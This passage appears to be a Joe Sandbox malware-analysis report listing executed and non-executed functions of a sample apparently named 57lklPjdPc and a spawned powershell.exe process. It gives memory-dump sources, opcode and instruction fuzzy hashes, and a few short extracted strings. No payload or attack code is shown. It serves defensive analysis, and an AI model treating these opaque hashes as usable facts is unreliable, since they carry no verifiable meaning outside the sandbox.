Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10

Function 05FC78C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10

Function 05FCE990 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5723bc31b97ab4c0801527b6e32df970731b855527219b1d39810eb745e80a7
Instruction ID: e9656467a46525c0e484df3567cf78311e9105b5534933cadde7484b5d566737
Opcode Fuzzy Hash: c5723bc31b97ab4c0801527b6e32df970731b855527219b1d39810eb745e80a7
Instruction Fuzzy Hash: 36C08C61001080CBC342C260C862740BB21AB81208F98C0E890444B341CA1B9D039644

Function 05FC3C80 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63231dfdcff004f735c3b16e3886dab14189b0c04069f92906c55155d35fb7dc
Instruction ID: b41a81c1cd62acbbef24a17e10d01630aeb575c9158b36d6bf54fa55f34d0b78
Opcode Fuzzy Hash: 63231dfdcff004f735c3b16e3886dab14189b0c04069f92906c55155d35fb7dc
Instruction Fuzzy Hash: 8BC04C611091815FC7819754CE55C217B709B4231531DD0EAA545DB293C69ED8069701

Function 05ED7F30 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10

Function 016BA0F5 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530612211.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baef7a4e8efdb5394e9ee8fa9198d27c480b091c0362a69214e05e2a907fba3a
Instruction ID: 45b773a97eede2183a48479a7fd5e2f9a7be62e791b8c3d7fa0dd821683b13ee
Opcode Fuzzy Hash: baef7a4e8efdb5394e9ee8fa9198d27c480b091c0362a69214e05e2a907fba3a
Instruction Fuzzy Hash: BBC00274904408CBCB11CA94CD94AEDBBB6BB48305F104155A90562264C6365D52DF51

Function 05768660 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644

Function 016F9B85 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309e81da80f643b0188141e6f032c83a492eaed871e92a823900559257c95da6
Instruction ID: 498e9ca3fc1f7ce8d010f56c030ed02d81f70c94a6cda8f7ed8fe88000d4a042
Opcode Fuzzy Hash: 309e81da80f643b0188141e6f032c83a492eaed871e92a823900559257c95da6
Instruction Fuzzy Hash: 4FB012303140018BD7104A08E8153AE3322F788308F118126E8424377DCD348C03DF81

Function 05FCA7E0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05FC8A60 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05FCA9C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05ED6FB0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 016F091A Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086bad1fcb3c590de0c9b8737e2b1d224e47b687a9af8494ead033039a398a67
Instruction ID: 45c29c228c730492e5079471ad857ff0cef59f4cac8dcc4b318f2339f78c7f4f
Opcode Fuzzy Hash: 086bad1fcb3c590de0c9b8737e2b1d224e47b687a9af8494ead033039a398a67
Instruction Fuzzy Hash: BFB09272C050548BCB40CF90E81429D7BB1BB04304F0100299416A2664C76418428B41

Function 016F7520 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05766790 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da98b4b192356d04f8b5399c185c53029b99a9bfc0a5aadef23885fcdfad865d
Instruction ID: 6ac67c671af9e679157492058696d2e38e8504125380058cd0c52625f4270241
Opcode Fuzzy Hash: da98b4b192356d04f8b5399c185c53029b99a9bfc0a5aadef23885fcdfad865d
Instruction Fuzzy Hash: 3990023506460C8B56413795740B9557B9CE5485157840051B90D815055E5574108699

Function 0576F640 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 057608B0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10411fa15b8f49ee623b9975f2e438a652363ecbb15022691abb101fa12d5d6
Instruction ID: 6ef678ec3ef737dc2864d9e6553515419d41f68f2e6ceb0438a92fad0d68e6d1
Opcode Fuzzy Hash: e10411fa15b8f49ee623b9975f2e438a652363ecbb15022691abb101fa12d5d6
Instruction Fuzzy Hash: B190027108460C8B495427957409555B7DC9558A25BC08051B50D4A50A5A6664104795

Function 05ED0540 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Non-executed Functions

Function 05EDDF88 Relevance: 3.3, Strings: 2, Instructions: 818COMMON

Download Yara Rule

Strings

$mq, xrefs: 05EDE53F
$mq, xrefs: 05EDE54F

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: $mq$$mq
API String ID: 0-4142058142
Opcode ID: 67d85c05cc6dc329c9967a5364e9742adf86ba692314359bf97d85c1c80f0d1b
Instruction ID: c4d25e0a6d3ebeb8c9481e9af8b328d90171ad4a7f55b15a94fd1dcd9dea6fcd
Opcode Fuzzy Hash: 67d85c05cc6dc329c9967a5364e9742adf86ba692314359bf97d85c1c80f0d1b
Instruction Fuzzy Hash: 117230747001198FD715DF58E499ABEB7F6FB88304F158429E946AB394CF38AC06CBA1

Function 05EDAFD0 Relevance: 2.9, Strings: 2, Instructions: 395COMMON

Download Yara Rule

Strings

,qq, xrefs: 05EDB12E
(qq, xrefs: 05EDB4CD

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: (qq$,qq
API String ID: 0-2499296393
Opcode ID: eb7f87058fecc144ca515c00c7ee00960421cf7d42570925f97110cb88ca65f4
Instruction ID: 0ea4132d2c98a02204afa26aa22c4d2a0a528fe56bbd93e5009557204364a6cf
Opcode Fuzzy Hash: eb7f87058fecc144ca515c00c7ee00960421cf7d42570925f97110cb88ca65f4
Instruction Fuzzy Hash: A9F13E74B001198FD714DFA8D488AAEF7F6FB88700F56D425E905A7354EB38DC468BA1

Function 016F4E78 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

(qq, xrefs: 016F4F42
(qq, xrefs: 016F519A

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: (qq$(qq
API String ID: 0-258571935
Opcode ID: ab08e8b3a9a76a09604be1c022314d8d6641b87e58649a9b1a751bd5e1343e9c
Instruction ID: 95d7dbb25bfaeee2d1a1e0907dbfd333c2e69c0f9ab0f773487bb240e4aab9ce
Opcode Fuzzy Hash: ab08e8b3a9a76a09604be1c022314d8d6641b87e58649a9b1a751bd5e1343e9c
Instruction Fuzzy Hash: AAA101306092018FC355DF68DD986AABBF2FFC6310F1584AED90A8B755CB35AC46CB91

Function 05761AA6 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

4'mq, xrefs: 05761B56
4'mq, xrefs: 05761B81

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: a8e12624fcc630965edaa7dd062806a77916524e4f0587b7ca2dbcb3674346b6
Instruction ID: 43ed500db2dc07e8b7de50a798dff8637ebbf3d11da004d59491cd7a3865ce11
Opcode Fuzzy Hash: a8e12624fcc630965edaa7dd062806a77916524e4f0587b7ca2dbcb3674346b6
Instruction Fuzzy Hash: 54612AB0A012459FD709DF6AF4586AEBBE3FBCC700F24C469D405DB268EB395806CB51

Function 05761AB8 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'mq, xrefs: 05761B56
4'mq, xrefs: 05761B81

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: 2eedcbc54060b899cb5d69bc477b468c221ae82d3ed5b60cc5246dc5431255a0
Instruction ID: ce6236f22592dec1f38c276e77ceb09288aa5a79b3fecafe6e6dabc6da86666e
Opcode Fuzzy Hash: 2eedcbc54060b899cb5d69bc477b468c221ae82d3ed5b60cc5246dc5431255a0
Instruction Fuzzy Hash: 3451F8B0A016059FD708DF6AF8546AEBBE3FFCC700F24C469D8059B668EB395806CB51

Function 0576B1C0 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

Oi8(, xrefs: 0576B358

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: Oi8(
API String ID: 0-2266985433
Opcode ID: 56066f86d6eaa03242acce57e6c48471bc2c3a99b0ed1a93edb169f6b63dd23a
Instruction ID: 7e186dd59d35a1986f55eed7c70cd57405f5cf80abd01b629fe12a5257d71d59
Opcode Fuzzy Hash: 56066f86d6eaa03242acce57e6c48471bc2c3a99b0ed1a93edb169f6b63dd23a
Instruction Fuzzy Hash: 0FC14B71E001298FCB14CBA9C984ABEFBF1FF49304F648569D859E7206D734E946DBA0

Function 016B3EA0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530612211.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998acddfb71241d5eeb98d20555a21bf9a979635d8354c15876958b6035dd716
Instruction ID: 7da50216840f60fcc99403ae0bbb574930f0a39eb1f64d5a5c376341345c3e00
Opcode Fuzzy Hash: 998acddfb71241d5eeb98d20555a21bf9a979635d8354c15876958b6035dd716
Instruction Fuzzy Hash: B2B13A71E0052A8BCB15CBA8C9806EDFBF1FB88305B588669D456E7302D734ED86CB90

Function 057649F8 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554bd8938e6f145d6c9b99a82dc1f52c5ff7bf7def4514d8252d5a936650ee50
Instruction ID: 2b3513a8054893297e33f865d4fbd3ae00ad7fa96722538c1cd6ae07ce239c67
Opcode Fuzzy Hash: 554bd8938e6f145d6c9b99a82dc1f52c5ff7bf7def4514d8252d5a936650ee50
Instruction Fuzzy Hash: 60B16C71E001299FDF16CFA9C8C0AAEFBF2FB48300B248569D855E7602D734E946DB94

Function 016B3E51 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530612211.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d77e4f3cfe45e8d68d7c57646f312541eec1b09ed4c9fa348e5200004ca5473
Instruction ID: 0407486b1d91eefca9dd7b8506aa90e2049a47ff28448e6f81a3a736a70279e5
Opcode Fuzzy Hash: 4d77e4f3cfe45e8d68d7c57646f312541eec1b09ed4c9fa348e5200004ca5473
Instruction Fuzzy Hash: F2816C71F0462A8FCB55CBA8CC806EEBBF1BB98311F18816AD455E7342D734D986CB90

Function 057649F3 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3e7c4dc7285319117210c5f658d7b6a7b75f21195adc3f32a5fd47b4114d1e
Instruction ID: 150bb14c079c372d306c1a9d60b2d5b85dd36c0d67db7312552019866605c51c
Opcode Fuzzy Hash: 7b3e7c4dc7285319117210c5f658d7b6a7b75f21195adc3f32a5fd47b4114d1e
Instruction Fuzzy Hash: 4C716E71E005299FDF15CFA9C884AAEFBF2FB88310F148629D825E7645D334E946DB90

Function 016F7D88 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56a437f70f34aaf6768ec7dd9c587e91f12d0b533513a0376093fb129c575ca
Instruction ID: 75820a76e8c99133ee796354b74bb7bacf59a34e93e6fc41b26f86ebf706bc8e
Opcode Fuzzy Hash: c56a437f70f34aaf6768ec7dd9c587e91f12d0b533513a0376093fb129c575ca
Instruction Fuzzy Hash: A851E331B0A240CFDB15DF29EC54AAA7BB3EB84310F1980AFD2069B796D7749C46C791

Function 05FCB5C1 Relevance: 7.7, Strings: 6, Instructions: 206COMMON

Download Yara Rule

Strings

4'mq, xrefs: 05FCB6CB
(qq, xrefs: 05FCB84A
4'mq, xrefs: 05FCB683
4'mq, xrefs: 05FCB7C2
4'mq, xrefs: 05FCB6F5
pqq, xrefs: 05FCB7DB

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: (qq$4'mq$4'mq$4'mq$4'mq$pqq
API String ID: 0-3859499035
Opcode ID: eb511330a5c48416c50a2a65b2b8ec95acd560b1182faed26090139f22a75a95
Instruction ID: 7adaacff661a38d2b89a05e5883b665081e767bba1c7abb5f389a744892ccae1
Opcode Fuzzy Hash: eb511330a5c48416c50a2a65b2b8ec95acd560b1182faed26090139f22a75a95
Instruction Fuzzy Hash: 6F7182B47101059FC708EF68E999A7EBBB6FFC8340F104528D8469B395DE38AD05CBA5

Function 057667A3 Relevance: 5.1, Strings: 4, Instructions: 121COMMON

Download Yara Rule

Strings

ob0, xrefs: 05766A4F
X^v, xrefs: 05766926
.&1>, xrefs: 0576691C
t`n(, xrefs: 0576687C

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: .&1>$X^v$ob0$t`n(
API String ID: 0-3849121580
Opcode ID: 69eaa3dfaf21f75b997ba5fd8b7afaa6e939496a6a920fd32cec5a4abbb942bf
Instruction ID: eb6541402c3eef7a195ec3125cbc043dec21a3f8765e9b5788613b9f85f9e328
Opcode Fuzzy Hash: 69eaa3dfaf21f75b997ba5fd8b7afaa6e939496a6a920fd32cec5a4abbb942bf
Instruction Fuzzy Hash: 3F8146B0811A448FD348CF4A8599FA4BBE1BF89304F5A86FAC25D9F232EB358445CF55

Analysis Process: powershell.exePID: 7808, Parent PID: 4264COMMON

Executed Functions

Function 073C1820 Relevance: 5.6, Strings: 4, Instructions: 578COMMON

Download Yara Rule

Strings

4'mq, xrefs: 073C1CC2
4'mq, xrefs: 073C1B68
4'mq, xrefs: 073C1B5E
4'mq, xrefs: 073C1CB8

Memory Dump Source

Source File: 00000002.00000002.49316349515.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_73c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq$4'mq$4'mq
API String ID: 0-815306772
Opcode ID: bfcc70b921e5fa426f8cb455b8eb23563b704ea268fa6f33442b84fc962ee0cb
Instruction ID: 9b8ba993e994238f8f314eb82a5cdf6ecb7c8078680c6cda3600888451f738e2
Opcode Fuzzy Hash: bfcc70b921e5fa426f8cb455b8eb23563b704ea268fa6f33442b84fc962ee0cb
Instruction Fuzzy Hash: 5C123AF5B053499FEB25DB68841067ABBA6AFC2310F1484AED849CB343DB35CD41D7A2

Function 045429F0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.49308585409.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2e87131c7fd2048ca0ebce1b921bb32593bad9aa9d59eda791dcc5e5e582fb
Instruction ID: f6401f566017ffa89d8cfdf02786dfaec56bcce0193107bf76dd6a01e8c6aee8
Opcode Fuzzy Hash: ab2e87131c7fd2048ca0ebce1b921bb32593bad9aa9d59eda791dcc5e5e582fb
Instruction Fuzzy Hash: 4291BC74A002199FCB05CF59C4989AEBBB1FF88314F25859AE815AB3A5C735FC51CBA0

Function 073C1806 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.49316349515.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_73c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 535466f46c33be6554b7a196b93f132992dd51c708142be7575e5cc681ad7096
Instruction ID: 7c2e687911e3aacc57c3aee2601440ea364493fbf852a6d5caeb104b078c3b7b
Opcode Fuzzy Hash: 535466f46c33be6554b7a196b93f132992dd51c708142be7575e5cc681ad7096
Instruction Fuzzy Hash: 80411BF5A053099FFB24CB64C541A797BB7AF82610F5845AED8089F253C734CD41DB92

Function 02B0D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.49307697302.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c9c5527f396a80a5fe28474cf7cdcab240e8295f469b5ec3529830fac86fd6
Instruction ID: 8a0c004f8814d355cc12e2ba4c60b0384e79cab2911a6ce794a13dc66c2a65fd
Opcode Fuzzy Hash: 09c9c5527f396a80a5fe28474cf7cdcab240e8295f469b5ec3529830fac86fd6
Instruction Fuzzy Hash: A3014C6240D3C05FD7134B659C94B52BFA8DF53224F1980DBE8888F1E3D2689C49CB72

Function 02B0D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.49307697302.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2b0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a9371b82f0c72ea1ad68020ae1334ed9f271d8c3a1512a6e4c550eb7c0ed29
Instruction ID: 3ae7e97f864d8d3cf4448699e86876980ec8890ae7a92d03321d5ba349b5d0b5
Opcode Fuzzy Hash: 01a9371b82f0c72ea1ad68020ae1334ed9f271d8c3a1512a6e4c550eb7c0ed29
Instruction Fuzzy Hash: 5F01A271904341AEE7214A6AD9C4F77FF98EF85334F18C49AED8C4A2C2E3799845C6B1

Function 04543C2B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

